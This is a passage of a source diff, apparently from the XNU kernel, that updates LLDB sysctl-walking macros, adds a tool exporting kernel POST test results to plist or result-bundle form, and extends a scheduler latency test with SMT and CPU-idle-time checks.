+            node_str = str(pp.oid_name)
+            if parent != "":
+                node_str = parent + "." + node_str
+                if node_str.startswith(prefix):
+                    yield pp, depth, parent
+        else:
+            yield pp, depth, parent
+        type = pp.oid_kind & 0xf
+        if type == 1 and pp.oid_arg1 != 0:
+            if node_str == "":
+                next_parent = str(pp.oid_name)
+                if parent != "":
+                    next_parent = parent + "." + next_parent
+            else:
+                next_parent = node_str
+            # Only recurse if the next parent starts with our allowed prefix.
+            # Note that it's OK if the parent string is too short (because the prefix might be for a deeper node).
+            prefix_len = min(len(prefix), len(next_parent))
+            if next_parent[:prefix_len] == prefix[:prefix_len]:
+                for x in IterateSysctls(Cast(pp.oid_arg1, "struct sysctl_oid_list *"), prefix, depth + 1, next_parent):
+                    yield x
 
 @lldb_command('showsysctls', 'P:')
 def ShowSysctls(cmd_args=[], cmd_options={}):
@@ -1186,28 +1214,63 @@ def ShowSysctls(cmd_args=[], cmd_options={}):
     else:
         _ShowSysctl_prefix = ''
         allowed_prefixes = []
-    def IterateSysctls(oid, parent_str, i):
-        headp = oid
-        parentstr = "<none>" if parent_str is None else parent_str
-        for pp in IterateListEntry(headp, 'struct sysctl_oid *', 'oid_link', 's'):
-            type = pp.oid_kind & 0xf
-            next_parent = str(pp.oid_name)
-            if parent_str is not None:
-                next_parent = parent_str + "." + next_parent
-            st = (" " * i) + str(pp.GetSBValue().Dereference()).replace("\n", "\n" + (" " * i))
-            if type == 1 and pp.oid_arg1 != 0:
-                # Check allowed_prefixes to see if we can recurse from root to the allowed prefix.
-                # To recurse further, we need to check only the the next parent starts with the user-specified
-                # prefix
-                if next_parent not in allowed_prefixes and next_parent.startswith(_ShowSysctl_prefix) is False:
-                    continue
-                print 'parent = "%s"' % parentstr, st[st.find("{"):]
-                IterateSysctls(Cast(pp.oid_arg1, "struct sysctl_oid_list *"), next_parent, i + 2)
-            elif _ShowSysctl_prefix == '' or next_parent.startswith(_ShowSysctl_prefix):
-                print ('parent = "%s"' % parentstr), st[st.find("{"):]
-    IterateSysctls(kern.globals.sysctl__children, None, 0)
 
+    for sysctl, depth, parentstr in IterateSysctls(kern.globals.sysctl__children, _ShowSysctl_prefix):
+        if parentstr == "":
+            parentstr = "<none>"
+        headp = sysctl
+        st = (" " * depth * 2) + str(sysctl.GetSBValue().Dereference()).replace("\n", "\n" + (" " * depth * 2))
+        print 'parent = "%s"' % parentstr, st[st.find("{"):]
+
+@lldb_command('showexperiments', 'F')
+def ShowExperiments(cmd_args=[], cmd_options={}):
+    """ Shows any active kernel experiments being run on the device via trial.
+        Arguments:
+        -F: Scan for changed experiment values even if no trial identifiers have been set.
+    """
+
+    treatment_id = str(kern.globals.trial_treatment_id)
+    experiment_id = str(kern.globals.trial_experiment_id)
+    deployment_id = kern.globals.trial_deployment_id._GetValueAsSigned()
+    if treatment_id == "" and experiment_id == "" and deployment_id == -1:
+        print("Device is not enrolled in any kernel experiments.")
+        if not '-F' in cmd_options:
+            return
+    else:
+        print("""Device is enrolled in a kernel experiment:
+    treatment_id: %s
+    experiment_id: %s
+    deployment_id: %d""" % (treatment_id, experiment_id, deployment_id))
+
+    print("Scanning sysctl tree for modified factors...")
+
+    kExperimentFactorFlag = 0x00100000
+    
+    formats = {
+            "IU": gettype("unsigned int *"),
+            "I": gettype("int *"),
+            "LU": gettype("unsigned long *"),
+            "L": gettype("long *"),
+            "QU": gettype("uint64_t *"),
+            "Q": gettype("int64_t *")
+    }
 
+    for sysctl, depth, parentstr in IterateSysctls(kern.globals.sysctl__children):
+        if sysctl.oid_kind & kExperimentFactorFlag:
+            spec = cast(sysctl.oid_arg1, "struct experiment_spec *")
+            # Skip if arg2 isn't set to 1 (indicates an experiment factor created without an experiment_spec).
+            if sysctl.oid_arg2 == 1:
+                if spec.modified == 1:
+                    fmt = str(sysctl.oid_fmt)
+                    ptr = spec.ptr
+                    t = formats.get(fmt, None)
+                    if t:
+                        value = cast(ptr, t)
+                    else:
+                        # Unknown type
+                        continue
+                    name = str(parentstr) + "." + str(sysctl.oid_name)
+                    print("%s = %d (Default value is %d)" % (name, dereference(value), spec.original_value))
 
 from memory import *
 from process import *
@@ -1240,3 +1303,4 @@ from ulock import *
 from ntstat import *
 from zonetriage import *
 from sysreg import *
+from counter import *
index 2c929f93fab173bf520a6e7f72874f59bf336eb2..a385e3dbb90bb1edd41d29ffd2f83384a6d06849 100644 (file)
@@ -33,6 +33,7 @@ COMMON_TARGETS = unit_tests \
                perf_index              \
                personas                \
                unixconf                \
+               kernpost_test_report \
 
 KEXT_TARGETS = pgokext.kext
 
diff --git a/tools/tests/kernpost_test_report/Makefile b/tools/tests/kernpost_test_report/Makefile
new file mode 100644 (file)
index 0000000..0181a87
--- /dev/null
@@ -0,0 +1,18 @@
+include ../Makefile.common
+
+DSTROOT?=$(shell /bin/pwd)
+SYMROOT?=$(shell /bin/pwd)
+OBJROOT?=$(shell /bin/pwd)
+
+CC:=$(shell xcrun -sdk "$(SDKROOT)" -find cc)
+
+CFLAGS:=$(ARCH_FLAGS) -g -Wall -Os -isysroot $(SDKROOT) -I$(SDKROOT)/System/Library/Frameworks/System.framework/PrivateHeaders -lkdd -framework Foundation
+
+all: $(DSTROOT)/kernpost_test_report
+
+$(DSTROOT)/kernpost_test_report: kernpost_test_report.m
+       $(CC) -o $@ $^ $(subst -arch i386,,$(CFLAGS))
+
+clean:
+       rm -f $(DSTROOT)/kernpost_test_report $(OBJROOT)/*.o
+       rm -rf $(SYMROOT)/*.dSYM
diff --git a/tools/tests/kernpost_test_report/kernpost_test_report.m b/tools/tests/kernpost_test_report/kernpost_test_report.m
new file mode 100644 (file)
index 0000000..76d81a0
--- /dev/null
@@ -0,0 +1,379 @@
+#import <Foundation/Foundation.h>
+#include <kcdata.h>
+#import <kdd.h>
+#include <mach/mach_time.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/param.h>
+#include <sys/stat.h>
+#include <sys/sysctl.h>
+#include <sysexits.h>
+#include <unistd.h>
+
+#define FREE_BUF(_buf)   \
+       do {                 \
+               if (_buf) {      \
+                       free(_buf);  \
+                       _buf = NULL; \
+               }                \
+       } while (0);
+
+#define ERR(_msg_format, ...) fprintf(stderr, "error: " _msg_format "\n", ##__VA_ARGS__)
+
+#define PERR(_msg) perror("error: " _msg)
+
+/* XNUPost KCData constants */
+NSString * const kXNUPostKCDataKeyTestConfig      = @"xnupost_testconfig";
+NSString * const kXNUPostKCDataKeyOSVersion       = @"osversion";
+NSString * const kXNUPostKCDataKeyBootargs        = @"boot_args";
+NSString * const kXNUPostKCDataKeyMachTBInfo      = @"mach_timebase_info";
+NSString * const kXNUPostKCDataKeyMachTBInfoDenom = @"denom";
+NSString * const kXNUPostKCDataKeyMachTBInfoNumer = @"numer";
+NSString * const kXNUPostKCDataKeySubTestConfig   = @"xnupost_test_config";
+NSString * const kXNUPostKCDataKeyTestName        = @"test_name";
+NSString * const kXNUPostKCDataKeyBeginTime       = @"begin_time";
+NSString * const kXNUPostKCDataKeyEndTime         = @"end_time";
+NSString * const kXNUPostKCDataKeyRetval          = @"retval";
+NSString * const kXNUPostKCDataKeyExpectedRetval  = @"expected_retval";
+
+/* Resultbundle info constants */
+NSString * const kRBInfoKeyVersion         = @"version";
+NSString * const kRBInfoKeyCategory        = @"test_category";
+NSString * const kRBInfoKeyTestID          = @"test_id";
+NSString * const kRBInfoKeyProject         = @"Project";
+NSString * const kRBInfoKeyBootargs        = @"boot-args";
+NSString * const kRBInfoKeyOSVersion       = @"osVersion";
+NSString * const kRBInfoKeyResultCode      = @"result_code";
+NSString * const kRBInfoKeyResultStarted   = @"result_started";
+NSString * const kRBInfoKeyResultFinished  = @"result_finished";
+NSString * const kRBInfoKeyMachTBInfo      = @"mach_timebase_info";
+NSString * const kRBInfoKeyMachTBInfoDenom = @"denom";
+NSString * const kRBInfoKeyMachTBInfoNumer = @"numer";
+NSString * const kRBInfoKeyBeginTimeRaw    = @"beginTimeRaw";
+NSString * const kRBInfoKeyEndTimeRaw      = @"endTimeRaw";
+
+NSNumber * const kResultBundleVersion  = @2;
+NSString * const kResultBundleCategory = @"unittest";
+NSString * const kResultBundleProject  = @"xnu";
+NSNumber * const kResultCodePass       = @200;
+NSNumber * const kResultCodeFail       = @400;
+
+#define COMMAND_EXPORT (0)
+static int g_command = COMMAND_EXPORT;
+#define OUTPUT_FORMAT_RAW (0)
+#define OUTPUT_FORMAT_PLIST_XML (1)
+#define OUTPUT_FORMAT_RESULTBUNDLE (2)
+static int g_output_format = OUTPUT_FORMAT_RAW;
+static char * g_output_dir = NULL;
+
+static void
+usage(void)
+{
+       const char * progname = getprogname();
+       fprintf(stderr,
+               "Usage:\t%s COMMAND [OPTIONS]\n\n"
+               "\t%s export -o OUTPUT_DIR_PATH [-f raw|plist|resultbundle]\n"
+               "\nSupported command:\n"
+               "\texport\n",
+               progname, progname);
+}
+
+static void
+parse_export_options(int argc, char * argv[])
+{
+       int ch;
+       bool error = false;
+
+       while ((ch = getopt(argc, argv, "o:f:")) != -1) {
+               switch (ch) {
+               case 'o':
+                       g_output_dir = optarg;
+                       break;
+               case 'f':
+                       if (strncmp(optarg, "raw", 4) == 0) {
+                               g_output_format = OUTPUT_FORMAT_RAW;
+                       } else if (strncmp(optarg, "plist", 6) == 0) {
+                               g_output_format = OUTPUT_FORMAT_PLIST_XML;
+                       } else if (strncmp(optarg, "resultbundle", 13) == 0) {
+                               g_output_format = OUTPUT_FORMAT_RESULTBUNDLE;
+                       } else {
+                               error = true;
+                       }
+                       break;
+               default:
+                       error = true;
+                       break;
+               }
+       }
+
+       if (g_output_dir == NULL) {
+               error = true;
+       }
+
+       struct stat path_stat;
+       if (stat(g_output_dir, &path_stat)) {
+               PERR("Failed to access output dir");
+               error = true;
+       } else if (!S_ISDIR(path_stat.st_mode)) {
+               ERR("error: Output path must be a directory");
+               error = true;
+       }
+
+       if (error) {
+               usage();
+               exit(EX_USAGE);
+       }
+}
+
+static void
+parse_options(int argc, char * argv[])
+{
+       if (argc > 1) {
+               char * cmd = argv[1];
+               argc--;
+               argv++;
+               if (strncmp(cmd, "export", 7) == 0) {
+                       g_command = COMMAND_EXPORT;
+                       parse_export_options(argc, argv);
+               } else {
+                       usage();
+                       exit(EX_USAGE);
+               }
+       } else {
+               usage();
+               exit(EX_USAGE);
+       }
+}
+
+static void
+retrieve_test_data(void ** raw_buf_p, size_t * raw_size_p)
+{
+       int rc = sysctlbyname("debug.xnupost_get_tests", NULL, raw_size_p, NULL, 0);
+       if (rc == 0 && *raw_size_p > 0) {
+               *raw_buf_p = malloc(*raw_size_p);
+               if (*raw_buf_p) {
+                       rc = sysctlbyname("debug.xnupost_get_tests", *raw_buf_p, raw_size_p, NULL, 0);
+                       if (0 != rc) {
+                               PERR("Failed to get KCData through sysctl");
+                       }
+               } else {
+                       PERR("Failed to allocate KCData raw buffer");
+               }
+       } else {
+               PERR("Failed to get size through sysctl");
+       }
+}
+
+static void
+export_raw(void * raw_buf, size_t raw_size)
+{
+       if (raw_buf) {
+               char output_path[MAXPATHLEN];
+               snprintf(output_path, MAXPATHLEN, "%s/xnupost.kcdata", g_output_dir);
+               FILE * output_fp = fopen(output_path, "w");
+               if (output_fp) {
+                       fwrite(raw_buf, raw_size, 1, output_fp);
+                       fclose(output_fp);
+               } else {
+                       PERR("Failed to open output path");
+               }
+       }
+}
+
+static void
+export_to_plist(void * raw_buf, size_t raw_size)
+{
+       if (raw_buf) {
+               char output_path[MAXPATHLEN];
+               snprintf(output_path, MAXPATHLEN, "%s/xnupost.plist", g_output_dir);
+               NSError * nsError          = nil;
+               NSDictionary * parsed_dict = parseKCDataBuffer(raw_buf, raw_size, &nsError);
+               if (parsed_dict) {
+                       NSData * plist_data = [NSPropertyListSerialization dataWithPropertyList:parsed_dict
+                                                                                        format:NSPropertyListXMLFormat_v1_0
+                                                                                       options:0
+                                                                                         error:&nsError];
+                       if (plist_data) {
+                               if (![plist_data writeToFile:[NSString stringWithUTF8String:output_path] atomically:YES]) {
+                                       ERR("Failed to write plist to %s", output_path);
+                               }
+                       } else {
+                               ERR("Failed to serialize result plist: %s", nsError.localizedDescription.UTF8String);
+                       }
+               } else {
+                       ERR("Failed to parse KCData to plist: %s", nsError.localizedDescription.UTF8String);
+               }
+       }
+}
+
+#define RESULTBUNDLE_TIME_STR_SIZE (30) // 0000-00-00T00:00:00.000+00:00'\0'
+#define RESULTBUNLDE_TIME_MS_INDEX (20)
+#define RESULTBUNLDE_TIME_TZ_COLON_INDEX (26)
+#define RESULTBUNDLE_TIME_MS_STR_SIZE (4) // 000'\0'
+#define MSEC_PER_USEC 1000ull
+
+static void
+get_estimated_time_str_resultbundle(char * output_str, uint64_t mach_abs_time_usec)
+{
+       uint64_t est_usec          = mach_boottime_usec() + mach_abs_time_usec;
+       time_t est_sec             = (time_t)(est_usec / USEC_PER_SEC);
+       uint64_t est_usec_fraction = est_usec % USEC_PER_SEC;
+       struct tm tm_info;
+       int i = 0;
+
+       localtime_r(&est_sec, &tm_info);
+       strftime(output_str, RESULTBUNDLE_TIME_STR_SIZE, "%Y-%m-%dT%H:%M:%S.000%z", &tm_info);
+
+       /* Fill out milliseconds */
+       char ms_str[RESULTBUNDLE_TIME_MS_STR_SIZE] = {0};
+       snprintf(ms_str, RESULTBUNDLE_TIME_MS_STR_SIZE, "%03llu", est_usec_fraction / MSEC_PER_USEC);
+       for (i = 0; i < 3; i++) {
+               output_str[RESULTBUNLDE_TIME_MS_INDEX + i] = ms_str[i];
+       }
+
+       /* Add colon for timezone offset */
+       for (i = RESULTBUNDLE_TIME_STR_SIZE - 1; i > RESULTBUNLDE_TIME_TZ_COLON_INDEX; i--) {
+               output_str[i] = output_str[i - 1];
+       }
+       output_str[RESULTBUNLDE_TIME_TZ_COLON_INDEX] = ':';
+}
+
+static void
+create_subtest_bundle_config(NSDictionary * testconfig, NSDictionary * subtest, char * bundle_dir)
+{
+       NSString * testName    = subtest[kXNUPostKCDataKeyTestName];
+       NSNumber * tbInfoDenom = testconfig[kXNUPostKCDataKeyMachTBInfo][kXNUPostKCDataKeyMachTBInfoDenom];
+       NSNumber * tbInfoNumer = testconfig[kXNUPostKCDataKeyMachTBInfo][kXNUPostKCDataKeyMachTBInfoNumer];
+       struct mach_timebase_info tb_info;
+       tb_info.denom            = tbInfoDenom.unsignedIntValue;
+       tb_info.numer            = tbInfoNumer.unsignedIntValue;
+       NSNumber * beginTimeRaw  = subtest[kXNUPostKCDataKeyBeginTime];
+       NSNumber * endTimeRaw    = subtest[kXNUPostKCDataKeyEndTime];
+       uint64_t begin_time_usec = (beginTimeRaw.unsignedLongLongValue * tb_info.numer) / (tb_info.denom * NSEC_PER_USEC);
+       uint64_t end_time_usec   = (endTimeRaw.unsignedLongLongValue * tb_info.numer) / (tb_info.denom * NSEC_PER_USEC);
+       bool test_status =
+           subtest[kXNUPostKCDataKeyRetval] && (subtest[kXNUPostKCDataKeyRetval] == subtest[kXNUPostKCDataKeyExpectedRetval]);
+
+       char output_path[MAXPATHLEN];
+       char * output_dir_end = NULL;
+
+       snprintf(output_path, MAXPATHLEN, "%s/test_%s", bundle_dir, testName.UTF8String);
+       if (mkdir(output_path, 0777)) {
+               PERR("Failed to create subtest bundle dir");
+       }
+       output_dir_end = output_path + strlen(output_path);
+
+       *output_dir_end = '\0';
+       strlcat(output_path, "/Attachments", MAXPATHLEN);
+       if (mkdir(output_path, 0777)) {
+               PERR("Failed to create subtest Attachments dir");
+       }
+
+       *output_dir_end = '\0';
+       strlcat(output_path, "/Diagnostics", MAXPATHLEN);
+       if (mkdir(output_path, 0777)) {
+               PERR("Failed to create subtest Diagnostics dir");
+       }
+
+       NSMutableDictionary * rbInfo = [NSMutableDictionary new];
+       rbInfo[kRBInfoKeyVersion]    = kResultBundleVersion;
+       rbInfo[kRBInfoKeyCategory]   = kResultBundleCategory;
+       rbInfo[kRBInfoKeyTestID]     = testName;
+       rbInfo[kRBInfoKeyProject]    = kResultBundleProject;
+       rbInfo[kRBInfoKeyOSVersion]  = testconfig[kXNUPostKCDataKeyOSVersion];
+       rbInfo[kRBInfoKeyBootargs]   = testconfig[kXNUPostKCDataKeyBootargs];
+       rbInfo[kRBInfoKeyResultCode] = test_status ? kResultCodePass : kResultCodeFail;
+
+       char estimated_time_str[RESULTBUNDLE_TIME_STR_SIZE];
+       get_estimated_time_str_resultbundle(estimated_time_str, begin_time_usec);
+       rbInfo[kRBInfoKeyResultStarted] = [NSString stringWithUTF8String:estimated_time_str];
+       get_estimated_time_str_resultbundle(estimated_time_str, end_time_usec);
+       rbInfo[kRBInfoKeyResultFinished] = [NSString stringWithUTF8String:estimated_time_str];
+
+       rbInfo[kRBInfoKeyMachTBInfo] = @{kRBInfoKeyMachTBInfoDenom : tbInfoDenom, kRBInfoKeyMachTBInfoNumer : tbInfoNumer};
+
+       rbInfo[kRBInfoKeyBeginTimeRaw] = beginTimeRaw;
+       rbInfo[kRBInfoKeyEndTimeRaw]   = endTimeRaw;
+
+       *output_dir_end = '\0';
+       strlcat(output_path, "/Info.plist", MAXPATHLEN);
+       NSURL * output_url   = [NSURL fileURLWithFileSystemRepresentation:output_path isDirectory:NO relativeToURL:nil];
+       NSError * writeError = nil;
+       if (![rbInfo writeToURL:output_url error:&writeError]) {
+               ERR("Failed to write Info.plist file: %s", writeError.localizedDescription.UTF8String);
+       }
+
+       *output_dir_end = '\0';
+       strlcat(output_path, test_status ? "/PASS.status" : "/FAIL.status", MAXPATHLEN);
+       int fd = open(output_path, O_CREAT | O_TRUNC | O_WRONLY, 0666);
+       if (fd == -1) {
+               PERR("Failed to create subtest status file");
+       } else {
+               close(fd);
+       }
+}
+
+static void
+export_to_resultbundle(void * raw_buf, size_t raw_size)
+{
+       if (raw_buf) {
+               NSError * nsError          = nil;
+               NSDictionary * parsed_dict = parseKCDataBuffer(raw_buf, raw_size, &nsError);
+               if (parsed_dict) {
+                       NSDictionary * testconfig = parsed_dict[kXNUPostKCDataKeyTestConfig];
+                       NSArray * subtests        = testconfig[kXNUPostKCDataKeySubTestConfig];
+
+                       char bundle_dir[MAXPATHLEN];
+                       snprintf(bundle_dir, MAXPATHLEN, "%s/xnupost", g_output_dir);
+                       if (mkdir(bundle_dir, 0777)) {
+                               PERR("Failed to create result bundle dir");
+                       }
+
+                       for (NSDictionary * subtest in subtests) {
+                               create_subtest_bundle_config(testconfig, subtest, bundle_dir);
+                       }
+               } else {
+                       ERR("Failed to parse KCData to plist: %s", nsError.localizedDescription.UTF8String);
+               }
+       }
+}
+
+static void
+execute_export(void)
+{
+       void * raw_buf  = NULL;
+       size_t raw_size = 0;
+       retrieve_test_data(&raw_buf, &raw_size);
+       switch (g_output_format) {
+       case OUTPUT_FORMAT_PLIST_XML:
+               export_to_plist(raw_buf, raw_size);
+               break;
+       case OUTPUT_FORMAT_RESULTBUNDLE:
+               export_to_resultbundle(raw_buf, raw_size);
+               break;
+       case OUTPUT_FORMAT_RAW:
+       default:
+               export_raw(raw_buf, raw_size);
+               break;
+       }
+
+       FREE_BUF(raw_buf);
+}
+
+int
+main(int argc, char * argv[])
+{
+       parse_options(argc, argv);
+       switch (g_command) {
+       case COMMAND_EXPORT:
+               execute_export();
+               break;
+       default:
+               usage();
+               exit(EX_USAGE);
+               break;
+       }
+
+       return 0;
+}
index e834ccdd0cc2f0251c7441e439a7ccd175bba60a..f8cccbefa4e30ff79bd26cd8f75cc7335398ed3a 100644 (file)
@@ -38,6 +38,7 @@
 #include <sysexits.h>
 #include <sys/sysctl.h>
 #include <getopt.h>
+#include <libproc.h>
 
 #include <spawn.h>
 #include <spawn_private.h>
 #include <stdatomic.h>
 
 #include <os/tsd.h>
+#include <os/lock.h>
 #include <TargetConditionals.h>
 
 typedef enum wake_type { WAKE_BROADCAST_ONESEM, WAKE_BROADCAST_PERTHREAD, WAKE_CHAIN, WAKE_HOP } wake_type_t;
-typedef enum my_policy_type { MY_POLICY_REALTIME, MY_POLICY_TIMESHARE, MY_POLICY_FIXEDPRI } my_policy_type_t;
+typedef enum my_policy_type { MY_POLICY_REALTIME, MY_POLICY_TIMESHARE, MY_POLICY_TIMESHARE_NO_SMT, MY_POLICY_FIXEDPRI } my_policy_type_t;
 
 #define mach_assert_zero(error)        do { if ((error) != 0) { fprintf(stderr, "[FAIL] error %d (%s) ", (error), mach_error_string(error)); assert(error == 0); } } while (0)
 #define mach_assert_zero_t(tid, error) do { if ((error) != 0) { fprintf(stderr, "[FAIL] Thread %d error %d (%s) ", (tid), (error), mach_error_string(error)); assert(error == 0); } } while (0)
@@ -229,7 +231,7 @@ static void
 create_churn_threads()
 {
        if (g_churn_count == 0) {
-               g_churn_count = g_numcpus - 1;
+               g_churn_count = g_test_rt_smt ? g_numcpus : g_numcpus - 1;
        }
 
        errno_t err;
@@ -417,6 +419,8 @@ parse_thread_policy(const char *str)
 {
        if (strcmp(str, "timeshare") == 0) {
                return MY_POLICY_TIMESHARE;
+       } else if (strcmp(str, "timeshare_no_smt") == 0) {
+               return MY_POLICY_TIMESHARE_NO_SMT;
        } else if (strcmp(str, "realtime") == 0) {
                return MY_POLICY_REALTIME;
        } else if (strcmp(str, "fixed") == 0) {
@@ -470,6 +474,9 @@ thread_setup(uint32_t my_id)
        switch (g_policy) {
        case MY_POLICY_TIMESHARE:
                break;
+       case MY_POLICY_TIMESHARE_NO_SMT:
+               proc_setthread_no_smt();
+               break;
        case MY_POLICY_REALTIME:
                /* Hard-coded realtime parameters (similar to what Digi uses) */
                pol.period      = 100000;
@@ -509,6 +516,20 @@ thread_setup(uint32_t my_id)
        return 0;
 }
 
+time_value_t
+get_thread_runtime(void)
+{
+       thread_basic_info_data_t info;
+       mach_msg_type_number_t info_count = THREAD_BASIC_INFO_COUNT;
+       thread_info(pthread_mach_thread_np(pthread_self()), THREAD_BASIC_INFO, (thread_info_t)&info, &info_count);
+
+       time_value_add(&info.user_time, &info.system_time);
+
+       return info.user_time;
+}
+
+time_value_t worker_threads_total_runtime = {};
+
 /*
  * Wait for a wakeup, potentially wake up another of the "0-N" threads,
  * and notify the main thread when done.
@@ -516,6 +537,8 @@ thread_setup(uint32_t my_id)
 static void*
 worker_thread(void *arg)
 {
+       static os_unfair_lock runtime_lock = OS_UNFAIR_LOCK_INIT;
+
        uint32_t my_id = (uint32_t)(uintptr_t)arg;
        kern_return_t kr;
 
@@ -736,6 +759,11 @@ worker_thread(void *arg)
                mach_assert_zero_t(my_id, kr);
        }
 
+       time_value_t runtime = get_thread_runtime();
+       os_unfair_lock_lock(&runtime_lock);
+       time_value_add(&worker_threads_total_runtime, &runtime);
+       os_unfair_lock_unlock(&runtime_lock);
+
        return 0;
 }
 
@@ -774,6 +802,29 @@ compute_stats(uint64_t *values, uint64_t count, float *averagep, uint64_t *maxp,
        *stddevp = _dev;
 }
 
+typedef struct {
+       natural_t sys;
+       natural_t user;
+       natural_t idle;
+} cpu_time_t;
+
+void
+record_cpu_time(cpu_time_t *cpu_time)
+{
+       host_cpu_load_info_data_t load;
+       mach_msg_type_number_t count = HOST_CPU_LOAD_INFO_COUNT;
+       kern_return_t kr = host_statistics(mach_host_self(), HOST_CPU_LOAD_INFO, (int *)&load, &count);
+       mach_assert_zero_t(0, kr);
+
+       natural_t total_system_time = load.cpu_ticks[CPU_STATE_SYSTEM];
+       natural_t total_user_time = load.cpu_ticks[CPU_STATE_USER] + load.cpu_ticks[CPU_STATE_NICE];
+       natural_t total_idle_time = load.cpu_ticks[CPU_STATE_IDLE];
+
+       cpu_time->sys = total_system_time;
+       cpu_time->user = total_user_time;
+       cpu_time->idle = total_idle_time;
+}
+
 int
 main(int argc, char **argv)
 {
@@ -787,6 +838,7 @@ main(int argc, char **argv)
        float           avg, stddev;
 
        bool test_fail = false;
+       bool test_warn = false;
 
        for (int i = 0; i < argc; i++) {
                if (strcmp(argv[i], "--switched_apptype") == 0) {
@@ -1026,6 +1078,11 @@ main(int argc, char **argv)
                usleep(g_iteration_sleeptime_us);
        }
 
+       cpu_time_t start_time;
+       cpu_time_t finish_time;
+
+       record_cpu_time(&start_time);
+
        /* Go! */
        for (uint32_t i = 0; i < g_iterations; i++) {
                uint32_t j;
@@ -1100,6 +1157,8 @@ main(int argc, char **argv)
                }
        }
 
+       record_cpu_time(&finish_time);
+
        /* Rejoin threads */
        for (uint32_t i = 0; i < g_numthreads; i++) {
                ret = pthread_join(threads[i], NULL);
@@ -1116,6 +1175,9 @@ main(int argc, char **argv)
                join_churn_threads();
        }
 
+       uint32_t cpu_idle_time = (finish_time.idle - start_time.idle) * 10;
+       uint32_t worker_threads_runtime = worker_threads_total_runtime.seconds * 1000 + worker_threads_total_runtime.microseconds / 1000;
+
        compute_stats(worst_latencies_ns, g_iterations, &avg, &max, &min, &stddev);
        printf("Results (from a stop):\n");
        printf("Max:\t\t%.2f us\n", ((float)max) / 1000.0);
@@ -1171,6 +1233,7 @@ main(int argc, char **argv)
                                    secondary ? " SECONDARY" : "",
                                    fail ? " FAIL" : "");
                        }
+                       test_warn |= (secondary || fail);
                        test_fail |= fail;
                        fail_count += fail;
                }
@@ -1181,6 +1244,17 @@ main(int argc, char **argv)
                }
        }
 
+       if (g_test_rt_smt && (g_each_spin_duration_ns >= 200000) && !test_warn) {
+               printf("cpu_idle_time=%dms worker_threads_runtime=%dms\n", cpu_idle_time, worker_threads_runtime);
+               if (cpu_idle_time < worker_threads_runtime / 4) {
+                       printf("FAIL cpu_idle_time unexpectedly small\n");
+                       test_fail = 1;
+               } else if (cpu_idle_time > worker_threads_runtime * 2) {
+                       printf("FAIL cpu_idle_time unexpectedly large\n");
+                       test_fail = 1;
+               }
+       }
+
        free(threads);
        free(g_thread_endtimes_abs);
        free(worst_latencies_ns);
@@ -1247,7 +1321,7 @@ static void __attribute__((noreturn))
 usage()
 {
        errx(EX_USAGE, "Usage: %s <threads> <chain | hop | broadcast-single-sem | broadcast-per-thread> "
-           "<realtime | timeshare | fixed> <iterations>\n\t\t"
+           "<realtime | timeshare | timeshare_no_smt | fixed> <iterations>\n\t\t"
            "[--trace <traceworthy latency in ns>] "
            "[--verbose] [--spin-one] [--spin-all] [--spin-time <nanos>] [--affinity]\n\t\t"
            "[--no-sleep] [--drop-priority] [--churn-pri <pri>] [--churn-count <n>]\n\t\t"